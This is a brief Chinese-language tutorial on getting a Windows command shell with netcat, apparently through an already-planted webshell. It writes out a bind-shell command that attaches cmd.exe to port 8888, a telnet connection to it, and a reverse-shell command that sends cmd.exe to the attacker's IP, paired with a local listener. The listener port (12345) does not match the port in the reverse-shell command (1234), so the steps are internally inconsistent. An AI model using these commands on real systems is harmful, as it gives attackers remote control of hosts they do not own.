使用nc获取cmdshell
NetCat简称nc
正向连接的方式就是在目标主机上绑定一个端口,当有客户端连接过来的时候就把该连接请求转向cmd.exe来处理,从而客户端获取一个类型命令提示符的执行环境
执行命令:
CMD路径:c:\windows\system32\cmd.exe
1.语句:\c D:\wwwroot\case1\nc.exe -l -p 8888 -t -e cmd.exe
2.客户端直接使用telnet连接就可获得一个cmdshell权限:Telnet 172.16.156.77
反向连接的方式是客户端主动开启一个端口等待目标主机来连接,连接成功后将客户端要执行的命令转交给目标的cmd.exe来处理
1.本地执行:c:\nc -vv -l -p 12345 //监听端口
2.webshell执行:
CMD路径:c:\windows\system32\cmd.exe
语句:\c D:\wwwroot\case1\nc.exe 172.16.156.22 1234 -e cmd.exe //本地ip
3.监听方获取一个反向连接过来的cmdshell